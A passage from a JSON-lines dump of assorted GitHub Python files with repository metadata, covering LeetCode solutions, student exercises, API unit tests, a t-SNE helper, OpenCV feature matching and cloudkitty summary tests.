Length\")\nplt.ylabel(\"Cumulative Probability\")\n\nplt.margins(0.02) # avoid out of range values\n\n\nplt.savefig('CDF.png')\n# plt.show()\n\n","repo_name":"zjspj/Yeast_genome_assembly_CS199","sub_path":"Analysis/CDF/cdf_graph.py","file_name":"cdf_graph.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070908647","text":"# 给定一个由 0 和 1 组成的矩阵 matrix ,找出只包含 1 的最大矩形,并返回其面积。 \n# \n# 注意:此题 matrix 输入格式为一维 01 字符串数组。 \n# \n# \n# \n# 示例 1: \n# \n# \n# \n# \n# 输入:matrix = [\"10100\",\"10111\",\"11111\",\"10010\"]\n# 输出:6\n# 解释:最大矩形如上图所示。\n# \n# \n# 示例 2: \n# \n# \n# 输入:matrix = []\n# 输出:0\n# \n# \n# 示例 3: \n# \n# \n# 输入:matrix = [\"0\"]\n# 输出:0\n# \n# \n# 示例 4: \n# \n# \n# 输入:matrix = [\"1\"]\n# 输出:1\n# \n# \n# 示例 5: \n# \n# \n# 输入:matrix = [\"00\"]\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# rows == matrix.length \n# cols == matrix[0].length \n# 0 <= row, cols <= 200 \n# matrix[i][j] 为 '0' 或 '1' \n# \n# \n# \n# \n# 注意:本题与主站 85 题相同(输入参数格式不同): https://leetcode-cn.com/problems/maximal-\n# rectangle/ \n# Related Topics 栈 数组 动态规划 矩阵 单调栈 👍 23 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nfrom typing import List\n\n\nclass Solution:\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n \"\"\"\n 方法1:计算每行到当前元素时1的数量\n \"\"\"\n res = 0\n if not matrix:\n return res\n m = len(matrix)\n n = len(matrix[0])\n pre_sum = [[0 for _ in range(n)] for _ in range(m)]\n for i in range(m):\n for j in range(n):\n # 第一列直接赋值\n if j == 0:\n pre_sum[i][j] = int(matrix[i][j])\n elif matrix[i][j] == '1':\n pre_sum[i][j] = pre_sum[i][j - 1] + 1\n # print(pre_sum)\n\n for i in range(m):\n for j in range(n):\n if pre_sum[i][j] == 0:\n continue\n # 计算矩形宽的最小值,以及高。\n high = 0\n width = pre_sum[i][j]\n rec = 0\n for k in range(i, -1, -1):\n if pre_sum[k][j] == 0:\n break\n high += 1\n width = min(width, pre_sum[k][j])\n # 计算以当前元素为右下角的矩形的最大值。\n rec = max(rec, high * width)\n res = max(rec, res)\n\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n# if __name__ == '__main__':\n# # matrix = [[\"1\", \"0\", \"1\", \"0\", \"0\"], [\"1\", \"0\", \"1\", \"1\", \"1\"], [\"1\", \"1\", \"1\", \"1\", \"1\"],\n# # [\"1\", \"0\", \"0\", \"1\", \"0\"]]\n# matrix = [[\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"1\"],\n# [\"0\", \"1\", \"1\", \"1\"], [\"0\", \"1\", \"1\", \"1\"], [\"1\", \"1\", \"1\", \"1\"]]\n# result = Solution().maximalRectangle(matrix)\n# print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 040]矩阵中最大的矩形.py","file_name":"[剑指 Offer II 040]矩阵中最大的矩形.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34402949382","text":"from test_base import TestBase\n\nimport datetime\nimport json\n\nfrom uploader import Uploader\n\nimport openapi_client\nfrom openapi_client.rest import ApiException\n\nclass TestIndividual(TestBase):\n\n\n _locations = []\n\n \"\"\"\n \"\"\"\n @classmethod\n def setUpClass(self):\n\n super(TestIndividual, self).setUpClass()\n sd = Uploader(self._config_file)\n sd.use_message_buffer = True\n json_data = json.loads('''{\n \"values\": {\n \"unique_id\": {\n \"column\": 2,\n \"type\": \"string\"\n },\n \"unique_os_id\": {\n \"column\": 2,\n \"type\": \"string\"\n },\n \"sample_oxford_id\": {\n \"column\": 3,\n \"type\": \"string\"\n },\n \"sample_alternate_oxford_id\": {\n \"column\": 4,\n \"type\": \"string\"\n },\n \"sample_source_id\": {\n \"column\": 6,\n \"type\": \"string\"\n },\n \"donor_source_code\": {\n \"column\": 7,\n \"type\": \"string\"\n },\n \"sample_source_type\": {\n \"column\": 8,\n \"type\": \"string\"\n },\n \"species\": {\n \"column\": 11,\n \"type\": \"string\"\n }\n }\n}''')\n sd.load_data_file(json_data, 'individual.tsv')\n\n self._messages = sd.message_buffer\n\n \"\"\"\n \"\"\"\n @classmethod\n def tearDownClass(self):\n\n self.deleteEventSets(['individual'], TestIndividual._locations)\n\n\n \"\"\"\n \"\"\"\n def test_individual(self):\n\n\n try:\n looked_up = self._dao.download_sampling_events_by_os_attr('oxford_id',\n 'TS0001-C')\n looked_up = looked_up.sampling_events[0]\n\n individual = self._dao.download_individual(looked_up.individual_id)\n\n assert individual.attrs\n assert individual.attrs[0].attr_value == '3D7'\n\n looked_up1 = self._dao.download_sampling_events_by_os_attr('oxford_id',\n 'TS0001-CW7')\n looked_up1 = looked_up1.sampling_events[0]\n\n individual1 = self._dao.download_individual(looked_up1.individual_id)\n\n assert individual1.attrs\n assert individual1.attrs[0].attr_value == '3D7'\n\n assert looked_up.individual_id == looked_up1.individual_id\n\n except ApiException as error:\n self.fail(\"test_individual: Exception when calling download_sampling_event_by_attr {}\"\n .format(error))\n\n \"\"\"\n \"\"\"\n def test_no_individual(self):\n\n\n try:\n looked_up = self._dao.download_sampling_events_by_os_attr('oxford_id',\n 'TS0001-CW5')\n looked_up = looked_up.sampling_events[0]\n\n assert looked_up.individual is None\n\n\n except ApiException as error:\n self.fail(\"test_no_individual: Exception when calling download_sampling_event_by_attr {}\"\n .format(error))\n","repo_name":"malariagen/sims-backbone","sub_path":"upload/test/test_individual.py","file_name":"test_individual.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19167749651","text":"import os\r\nimport sys\r\n\r\ndirectory = \".\\site\\includes\"\r\n\r\n# code adapted from https://stackoverflow.com/a/2212728\r\nfor folder, subs, files in os.walk(directory):\r\n for filename in files:\r\n if filename.endswith(\".html\"):\r\n with open(os.path.join(folder, filename), 'r') as src:\r\n jsFile = os.path.join(folder, os.path.basename(filename).split(\".\")[0] + \".js\")\r\n with open(jsFile, 'w') as dest:\r\n compressedContent = src.read().replace('\\n','').replace('\\r','')\r\n dest.write(\"document.write('\" + compressedContent + \"')\")","repo_name":"JoshuaJLi/blogoblag","sub_path":"htmlJsConvertor.py","file_name":"htmlJsConvertor.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21802749907","text":"import numpy as np\n\n#1.生成一个等差数列,首数为0,尾数为20,公差为1的数列。\na = np.arange(0,21,1)\nprint(a)\n\n#2.呈上题,将以上数列取出偶数。\n\n#第一种\nfor i in a:\n if i%2 == 0:\n print(\"数列中的偶数: \"+str(i))\n#第二种\neven_array = a[::2]\nprint(even_array)\n\n#3.呈1题,将数列取出3的倍数。\n\n#第一种\nfor i in a:\n if i%3 == 0:\n print(\"数列中3的倍数: \"+str(i))\n#第二种\narray_3 = a[3::3]\nprint(array_3)\n#熟悉array用法\nimport numpy as np\nx=np.array([[1,2,3],[5,6,7],[7,8,9]])\nprint(x[:,::5])","repo_name":"may4025425/ML100Days","sub_path":"homework/D01.py","file_name":"D01.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15773924600","text":"from sacnn.core import SacnnModel, get_arch\nfrom sacnn.core.preprocessing import process_sentences\n\nfrom .instance_stack import InstanceStack\nfrom .app_state import app_state\nfrom .constraints import FILTERS, SENTENCE_LENGTH\nfrom .word_to_vector import word_to_vector, WORD_DIMENSION\n\n\nclass ClassifierController():\n\n def __init__(self, max_stack=2):\n \"\"\"\n :param int max_stack:\n \"\"\"\n self._instance_stack = InstanceStack(max_stack)\n\n def select_instance(self, instance_name):\n \"\"\"\n :param str instance_name:\n \"\"\"\n if instance_name not in self._instance_stack:\n instance_data = app_state.get_instance_by_name(instance_name)\n\n if instance_data is not None:\n (name, hidden_units, num_labels, arch) = instance_data\n\n hyperparams = {\n 'name': instance_name,\n 'arch': arch,\n 'sentence_length': SENTENCE_LENGTH,\n 'word_dimension': WORD_DIMENSION,\n 'hidden_units': int(hidden_units),\n 'filters': FILTERS,\n 'num_labels': int(num_labels),\n }\n model = SacnnModel(get_arch(hyperparams))\n model.restore()\n self._instance_stack.push(model)\n else:\n raise BaseException('instance_not_found_by_name')\n\n def classify(self, instance_name, comments):\n \"\"\"\n :param str instance_name:\n :param str comment:\n :returns str:\n \"\"\"\n self.select_instance(instance_name)\n instance = self._instance_stack[instance_name]\n input_data = process_sentences(comments, SENTENCE_LENGTH, WORD_DIMENSION, word_to_vector)\n\n return instance.sentiment(input_data)\n","repo_name":"aicroe/sacnn","sub_path":"src/sacnn/app/classifier_controller.py","file_name":"classifier_controller.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7734458857","text":"# _*_ coding : utf-8 _*_\n# @Time : 2023/8/1 18:01\n# @Author : nancy_xieyy@icloud.com\n# @File : 03 变量类型\n# @Project : Python\n\n# 基本使用\n# int\nmoney = 5000\n# float\nmoney1 = 1.5\n\n# boolean\n# 流程控制语句,性别的实际企业开发sex gender\n# 男True\nsex = True\n\n# string 字符串\ns = \"雷猴\"\n\n# list 列表\n# 获取很多数据的时候可以存储到列表中,然后直接使用列表访问\nname_list = ['周杰伦', '科比']\nprint(name_list)\n\n# tuple 元组\nage_tuple = (18, 19, 20)\nprint(age_tuple)\n\n# dict 字典\n# 应用场景:scrapy框架\nperson = {'name':'Tom', 'age':18}\nprint(person)","repo_name":"nancyxieyy/Python","sub_path":"04 变量类型.py","file_name":"04 变量类型.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20413222298","text":"#!/usr/bin/env python3\n\"\"\"\nmodule for task 4\n\"\"\"\n\nimport numpy as np\nP_init = __import__('2-P_init').P_init\nHP = __import__('3-entropy').HP\n\n\ndef P_affinities(X, tol=1e-5, perplexity=30.0):\n \"\"\"\n calculates symmetric P affinities of data set\n \"\"\"\n D, P, betas, H = P_init(X, perplexity)\n for i in range(X.shape[0]):\n Hi, Pi = HP(np.append(D[i, :i], D[i, i+1:]), betas[i])\n mini = None\n maxi = None\n Hdiff = Hi - H\n while np.abs(Hdiff) > tol:\n if Hdiff > 0:\n mini = betas[i].copy()\n if maxi is None:\n betas[i] = betas[i] * 2\n else:\n betas[i] = (betas[i] + maxi) / 2\n else:\n maxi = betas[i].copy()\n if mini is None:\n betas[i] = betas[i] / 2\n else:\n betas[i] = (betas[i] + mini) / 2\n Hi, Pi = HP(np.append(D[i, :i], D[i, i + 1:]), betas[i])\n Hdiff = Hi - H\n P[i, np.concatenate((np.r_[0:i], np.r_[i+1:X.shape[0]]))] = Pi\n return (P.T + P) / (2 * X.shape[0])\n","repo_name":"not-notAlex/holbertonschool-machine_learning","sub_path":"unsupervised_learning/0x00-dimensionality_reduction/4-P_affinities.py","file_name":"4-P_affinities.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43197721362","text":"#accept name and surname here\nname = input(\"Enter name: \")\nsurname = input(\"Enter surname: \")\n\n#accept marks here\nmaths = int(input(\"Enter maths mark: \"))\nscience = int(input(\"Enter science mark: \"))\nart = int(input(\"Enter art mark: \"))\nenglish = int(input(\"Enter english mark: \"))\nict = int(input(\"Enter ict mark: \"))\n\n#find the average and total\n\ntotal_marks = maths + science + art + english + ict\naverage = total_marks/5\n\n#pass or fail?\n\nif average < 50:\n grade = \"F\"\nelse:\n grade = \"P\"\n\n#Output section\nprint(\"name: \", name)\nprint(\"surname: \", surname)\nprint(\"total marks: \", total_marks)\nprint(\"average: \", average)\nprint(\"grade: \", grade)\n\n","repo_name":"savaged/PyFun","sub_path":"InputMarks.py","file_name":"InputMarks.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14754920383","text":"'''\n\t[문제]\n\t\t아래 배열은 3명의 학생 데이터이다.\t\t\n\t\t각 학생은 3개씩 데이터로 표현한다. \n\t\t맨 앞은 번호, 그다음은 국어점수, 그다음은 수학점수이다.\t\t\t\t\t\n\t\t(예) \n\t\t\t1001번, 국어 100, 수학 20\n\t\t\t1002번, 국어 32, 수학 54\n\t\t\t1003번 국어 34, 수학 65\t\n\n\t\t[1] 전체 평균을 출력하시오.\n\t\t[2] 국어 1등 학생을 출력하시오.\n\t\t[3] 수학 1등 학생을 출력하시오.\n\t\t[4] 전체 1등 학생을 출력하시오.\n'''\n\na = [1001, 100, 20, 1002, 32, 54, 1003, 34, 65]\n\ntotal = 0\n\nkorMax = 0\nkorIndex = 0\n\nmathMax = 0\nmathIndex = 0\n\nfor i in range(len(a)) :\n if i % 3 == 1 :\n total += a[i]\n if korMax < a[i] :\n korMax = a[i]\n korIndex = i-1\n elif i % 3 == 2 :\n total += a[i]\n if mathMax < a[i] :\n mathMax = a[i]\n mathIndex = i-2\n \nprint(total)\navg = total / 3\nprint(f'전체 평균 = {avg:.2f}') # 파이썬의 toFixed()\nprint(f'국어 1등 학생 = {a[korIndex]}')\nprint(f'수학 1등 학생 = {a[mathIndex]}')\n\n","repo_name":"jomira0220/study","sub_path":"jomira/00_문법총정리/Python_문제풀기/일차배열/일차배열6/일차배열6_문제15_세트학생정보.py","file_name":"일차배열6_문제15_세트학생정보.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9813024480","text":"\nfrom set_config import config\nimport time\ndef get_post_data_goodstopn(new_image_paths):\n if len(new_image_paths)<1:\n return None,None\n api = config.http_apis['shelf_good_cluster_topn']\n img_local_files = ''\n for img_path in new_image_paths:\n img_local_files += img_path+\",\"\n trace_id = str(time.time())\n post_data = {\n \"trace_id\":trace_id,\n \"img_local_files\":img_local_files[:-1]\n }\n return api,post_data\n\ndef get_post_data_addgood(upc,image_path,goods_shelfgoods_id):\n trace_id = str(time.time())\n post_data = {\n \"trace_id\": trace_id,\n \"img_local_file\":image_path,\n \"good_upc\":upc,\n \"goods_shelfgoods_id\":goods_shelfgoods_id\n }\n api = config.http_apis['shelf_good_add_good']\n return api,post_data\n\ndef get_post_data_deletegood(goods_shelfgoods_id):\n trace_id = str(time.time())\n post_data = {\n \"trace_id\": trace_id,\n \"goods_shelfgoods_id\": goods_shelfgoods_id,\n }\n api = config.http_apis['shelf_good_delete_good']\n return api, post_data\n\n\nif __name__=='__main__':\n new_image_paths=[\"/home/ai/1.jpg\",\"/home/ai/2.jpg\",\"/home/ai/3.jpg\"]\n api, post_data = get_post_data_goodstopn(new_image_paths)\n print (post_data)","repo_name":"huachao2017/goodsdl","sub_path":"goods/freezer/keras_yolo3/util/shelfgoods_util.py","file_name":"shelfgoods_util.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70759852969","text":"from libqtile import bar, hook, pangocffi\nfrom libqtile.widget import base\n\nclass WindowName(base._TextBox):\n def __init__(self, width=bar.STRETCH, **config):\n base._TextBox.__init__(self, width=width, **config)\n\n def _configure(self, qtile, bar):\n base._TextBox._configure(self, qtile, bar)\n hook.subscribe.client_name_updated(self.hook_response)\n hook.subscribe.current_screen_change(self.hook_response)\n hook.subscribe.focus_change(self.hook_response)\n hook.subscribe.float_change(self.hook_response)\n\n def remove_hooks(self):\n hook.unsubscribe.client_name_updated(self.hook_response)\n hook.unsubscribe.current_screen_change(self.hook_response)\n hook.unsubscribe.focus_change(self.hook_response)\n hook.unsubscribe.float_change(self.hook_response)\n\n def hook_response(self, *args):\n w = self.bar.screen.group.current_window\n state = \"\"\n if w:\n if w.floating:\n state = \"▪ \"\n var = {}\n var[\"state\"] = state\n var[\"name\"] = pangocffi.markup_escape_text(self.name_sub(w.name))\n wm_class = w.get_wm_class()\n var[\"class\"] = pangocffi.markup_escape_text(\n wm_class[0].upper() if wm_class else \"\")\n self.format = \"{classcolour}{class} {namecolour}{name} {state}\"\n if self.bar.screen == self.qtile.current_screen:\n var[\"classcolour\"] = \"\"\n var[\"namecolour\"] = \"\"\n else:\n var[\"classcolour\"] = \"\"\n var[\"namecolour\"] = \"\"\n\n text = self.format.format(**var)\n else:\n text = \"\"\n self.update(text)\n\n def name_sub(self, text):\n for string in [\" - qutebrowser\", \" — Mozilla Firefox\"]:\n text = text.replace(string, \"\")\n return text\n\n def finalize(self):\n self.remove_hooks()\n base._TextBox.finalize(self)\n","repo_name":"dairnarth/.dotfiles","sub_path":"stow/qtile/.config/qtile/modules/windowname.py","file_name":"windowname.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23395399338","text":"import numpy as np\r\nfrom scipy.sparse.linalg import svds\r\nfrom sklearn.cluster import SpectralClustering\r\nfrom sklearn.preprocessing import normalize\r\n\r\n\r\nclass EDSC_w:\r\n\r\n def __init__(self, n_clusters, regu_coef=1., n_neighbors=10, ro=0.5, save_affinity=False):\r\n \"\"\"\r\n\r\n :param n_clusters: number of clusters\r\n :param regu_coef: regularization coefficient i.e. labmda\r\n :param n_neighbors: number of neighbors of knn graph\r\n :param ro: post-processing parameters\r\n :param save_affinity: if True, save affinity matrix\r\n \"\"\"\r\n self.n_clusters = n_clusters\r\n self.regu_coef = regu_coef\r\n self.n_neighbors = n_neighbors\r\n self.ro = ro\r\n self.save_affinity = save_affinity\r\n\r\n\r\n def fit(self, X):\r\n X_ = np.transpose(X) # shape: n_dim * n_samples 转置X才是真正的X\r\n X_embedding = X_\r\n I = np.eye(X.shape[0])\r\n inv = np.linalg.inv(np.dot(np.transpose(X_embedding), X_embedding) + self.regu_coef * I)#inv是求逆\r\n C = np.dot(np.dot(inv, np.transpose(X_embedding)), X_)\r\n Coef = self.thrC(C, self.ro) #Efficient Dense Subspace Clustering\r\n y_pre, C_final = self.post_proC(Coef, self.n_clusters, 8, 18)#spectral clustering\r\n\r\n return y_pre\r\n\r\n def thrC(self, C, ro):\r\n if ro < 1:\r\n N = C.shape[1]\r\n Cp = np.zeros((N, N))\r\n S = np.abs(np.sort(-np.abs(C), axis=0))\r\n Ind = np.argsort(-np.abs(C), axis=0)\r\n for i in range(N):\r\n cL1 = np.sum(S[:, i]).astype(float)\r\n stop = False\r\n csum = 0\r\n t = 0\r\n while (stop == False):\r\n csum = csum + S[t, i]\r\n if csum > ro * cL1:\r\n stop = True\r\n Cp[Ind[0:t + 1, i], i] = C[Ind[0:t + 1, i], i]\r\n t = t + 1\r\n else:\r\n Cp = C\r\n return Cp\r\n\r\n\r\n def post_proC(self, C, K, d, alpha):#对C进行spectral clustering\r\n # C: coefficient matrix, K: number of clusters, d: dimension of each subspace\r\n C = 0.5 * (C + C.T)\r\n r = d * K + 1\r\n U, S, _ = svds(C, r, v0=np.ones(C.shape[0]))\r\n U = U[:, ::-1]\r\n S = np.sqrt(S[::-1])\r\n S = np.diag(S)\r\n U = U.dot(S)\r\n U = normalize(U, norm='l2', axis=1)\r\n Z = U.dot(U.T)\r\n Z = Z * (Z > 0)\r\n L = np.abs(Z ** alpha)\r\n L = L / L.max()\r\n L = 0.5 * (L + L.T)\r\n spectral = SpectralClustering(n_clusters=K, eigen_solver='arpack', affinity='precomputed',\r\n assign_labels='discretize')\r\n spectral.fit(L)\r\n grp = spectral.fit_predict(L) + 1\r\n return grp, L\r\n\r\n","repo_name":"compasszzn/subspace-clustering","sub_path":"method/EDSC_w.py","file_name":"EDSC_w.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72341380969","text":"#### Feature Extraction and Matching\n\nimport cv2\nimport numpy as np\nimport json\n\n# Load the camera parameters\ncamera_matrix = np.load(\"camera_matrix.npy\")\ndistortion_coeffs = np.load(\"distortion_coeffs.npy\")\n\n# Load the paths to the object images\nimage_paths = [\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img1.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img2.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img3.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img4.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img5.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img6.jpg\",\n \"C:/Users/Atharav Jadhav/source/repos/2D-3D/Object Images/img7.jpg\"\n # Add paths for the rest of the images\n]\n\n# Create feature detector and descriptor extractor\ndetector = cv2.ORB_create()\ndescriptor = cv2.ORB_create()\n\n# Initialize lists to store keypoints and descriptors\nkeypoints_list = []\ndescriptors_list = []\n\n# Loop through the images and extract features\nfor i, image_path in enumerate(image_paths):\n print(f\"Processing image {i+1}/{len(image_paths)}\")\n # Load the image\n image = cv2.imread(image_path)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Undistort the image using camera parameters\n undistorted_image = cv2.undistort(gray, camera_matrix, distortion_coeffs)\n\n # Detect keypoints and compute descriptors\n keypoints, descriptors = detector.detectAndCompute(undistorted_image, None)\n print(f\"Number of keypoints detected in image {i+1}: {len(keypoints)}\")\n\n # Store the keypoints and descriptors\n keypoints_list.append(keypoints)\n descriptors_list.append(descriptors)\n\n # Save keypoints as a JSON file\n keypoints_file = f\"keypoints_{i+1}.json\"\n keypoints_data = [(kp.pt, kp.size, kp.angle, kp.response, kp.octave, kp.class_id) for kp in keypoints]\n\n with open(keypoints_file, \"w\") as keypoints_output:\n json.dump(keypoints_data, keypoints_output)\n\n print(\"Keypoints saved as\", keypoints_file)\n\n # Save descriptors as a JSON file\n descriptors_file = f\"descriptors_{i+1}.json\"\n descriptors_data = descriptors.tolist()\n\n with open(descriptors_file, \"w\") as descriptors_output:\n json.dump(descriptors_data, descriptors_output)\n\n print(\"Descriptors saved as\", descriptors_file)\n\n# Initialize list to store matches\nmatches_list = []\n\n# Loop through pairs of images\nfor i in range(len(image_paths) - 1):\n print(f\"Matching features between images {i+1} and {i+2}\")\n # Match features between the current image and the next image\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(descriptors_list[i], descriptors_list[i+1])\n print(f\"Number of matches between images {i+1} and {i+2}: {len(matches)}\")\n\n # Store the matches\n matches_list.append(matches)\n\n# Save matches as a JSON file\nmatches_file = \"matches.json\"\nmatches_data = []\nfor matches in matches_list:\n matches_data.append([(match.queryIdx, match.trainIdx) for match in matches])\n\nwith open(matches_file, \"w\") as matches_output:\n json.dump(matches_data, matches_output)\n\nprint(\"Matches saved as\", matches_file)","repo_name":"AtharavJadhav/2D-3D","sub_path":"Feature_Extraction.py","file_name":"Feature_Extraction.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728479510","text":"#!/usr/bin/env python3\n#\n# euler33 / digit cancelling fractions\n\n\n##main loop\ntotalnum,totaldenom=1,1\nA=[str(j) for j in range(1,10)]\nfor i in range(11,100):\n s=str(i)\n for j in range(i+1,100):\n f=i/j\n t=str(j)\n for k in A:\n y=s.replace(k,'')\n z=t.replace(k,'')\n if y!='' and z!='' and int(y)!=0 and int(z)!=0 and int(y)!=int(s) and int(z)!=int(t):\n if f==(int(y)/int(z)):\n totalnum*=i\n totaldenom*=j\n\nprint(totalnum)\nprint(totaldenom)\n\n\n\n\n","repo_name":"allagonne/Euler_project","sub_path":"euler33.py","file_name":"euler33.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40710539392","text":"import logging\nfrom itertools import islice\nfrom google.appengine.api.taskqueue import TransientError, Queue, \\\n TaskAlreadyExistsError, DuplicateTaskNameError, TombstonedTaskError\nfrom google.appengine.runtime.apiproxy_errors import DeadlineExceededError\nfrom gcp_census.decorators import retry\n\n\nclass Tasks(object):\n\n @classmethod\n def split_every(cls, n, iterable):\n i = iter(iterable)\n piece = list(islice(i, n))\n while piece:\n yield piece\n piece = list(islice(i, n))\n\n @classmethod\n def schedule(cls, queue_name, tasks):\n queue = Queue(queue_name)\n batch_size = 100\n task_count = 0\n for task_batch in cls.split_every(batch_size, tasks):\n cls._add_single_batch(queue, task_batch)\n task_count += len(task_batch)\n if task_count > 0:\n logging.info(\"Scheduled %d tasks in max %d batches\",\n task_count, batch_size)\n\n @classmethod\n @retry((DeadlineExceededError, TransientError), tries=6, delay=2, backoff=2)\n def _add_single_batch(cls, queue, task_batch):\n if task_batch:\n try:\n queue.add(task_batch)\n logging.info(\"Scheduled %d tasks\", len(task_batch))\n except (DuplicateTaskNameError,\n TaskAlreadyExistsError,\n TombstonedTaskError) as ex:\n logging.warning(\"Task already added %s. Exception: %s\",\n task_batch, type(ex))\n","repo_name":"ocadotechnology/gcp-census","sub_path":"gcp_census/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"36506792938","text":"import flask\nimport uuid\n\nfrom unittest import mock\nimport voluptuous\n\nfrom cloudkitty.api.v2.summary import summary\nfrom cloudkitty import tests\n\nfrom cloudkitty.utils import tz as tzutils\n\n\nclass TestSummaryEndpoint(tests.TestCase):\n\n def setUp(self):\n super(TestSummaryEndpoint, self).setUp()\n self.endpoint = summary.Summary()\n\n def test_type_filter_is_passed_separately(self):\n policy_mock = mock.patch('cloudkitty.common.policy.authorize')\n\n flask.request.context = mock.Mock()\n flask.request.context.project_id = str(uuid.uuid4())\n flask.request.context.is_admin = True\n\n with mock.patch.object(self.endpoint._storage, 'total') as total_mock:\n with policy_mock, mock.patch('flask.request.args.lists') as fmock:\n total_mock.return_value = {'total': 0, 'results': []}\n fmock.return_value = [\n ('filters', 'a:b,type:awesome')]\n self.endpoint.get()\n total_mock.assert_called_once_with(\n begin=tzutils.get_month_start(),\n end=tzutils.get_next_month(),\n groupby=None,\n filters={'a': ['b']},\n metric_types=['awesome'],\n offset=0,\n limit=100,\n paginate=True,\n )\n\n def test_invalid_response_type(self):\n self.assertRaises(voluptuous.Invalid, self.endpoint.get,\n response_format=\"INVALID_RESPONSE_TYPE\")\n\n def test_generate_response_table_response_type(self):\n objects = [{\"a1\": \"obj1\", \"a2\": \"value1\"},\n {\"a1\": \"obj2\", \"a2\": \"value2\"}]\n\n total = {'total': len(objects),\n 'results': objects}\n\n response = self.endpoint.generate_response(\n summary.TABLE_RESPONSE_FORMAT, total)\n\n self.assertIn('total', response)\n self.assertIn('results', response)\n self.assertIn('columns', response)\n\n self.assertEqual(len(objects), response['total'])\n self.assertEqual(list(objects[0].keys()), response['columns'])\n self.assertEqual(\n [list(res.values()) for res in objects], response['results'])\n self.assertEqual(summary.TABLE_RESPONSE_FORMAT, response['format'])\n\n def test_generate_response_object_response_type(self):\n objects = [{\"a1\": \"obj1\", \"a2\": \"value1\"},\n {\"a1\": \"obj2\", \"a2\": \"value2\"}]\n\n total = {'total': len(objects),\n 'results': objects}\n\n response = self.endpoint.generate_response(\n summary.OBJECT_RESPONSE_FORMAT, total)\n\n self.assertIn('total', response)\n self.assertIn('results', response)\n self.assertNotIn('columns', response)\n\n self.assertEqual(len(objects), response['total'])\n self.assertEqual(objects, response['results'])\n self.assertEqual(summary.OBJECT_RESPONSE_FORMAT, response['format'])\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/tests/api/v2/summary/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"} +{"seq_id":"72085522727","text":"lanternfishes = [int(x) for x in [line.strip().split(',') for line in open('input.txt', 'r')][0]]\n\n\ndef decrese_day(arr):\n to_increse = 0\n for i in range(len(arr)):\n if arr[i] == 0:\n arr[i] = 6\n to_increse +=1\n else:\n arr[i] -= 1\n for _ in range(to_increse):\n arr.append(8)\n\nfor i in range(256):\n decrese_day(lanternfishes)\n\nprint(len(lanternfishes))","repo_name":"GMainardi/Advent-2021","sub_path":"06/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16334977903","text":"def prime(n):\n c=0\n for i in range(2,n):\n if (n%i==0):\n c=c+1\n break\n else:\n continue\n if(c==1):\n print(\"It is not a prime no.\")\n else:\n print(\"It is a prime no.\")\n\nn=int(input(\"Enter a number: 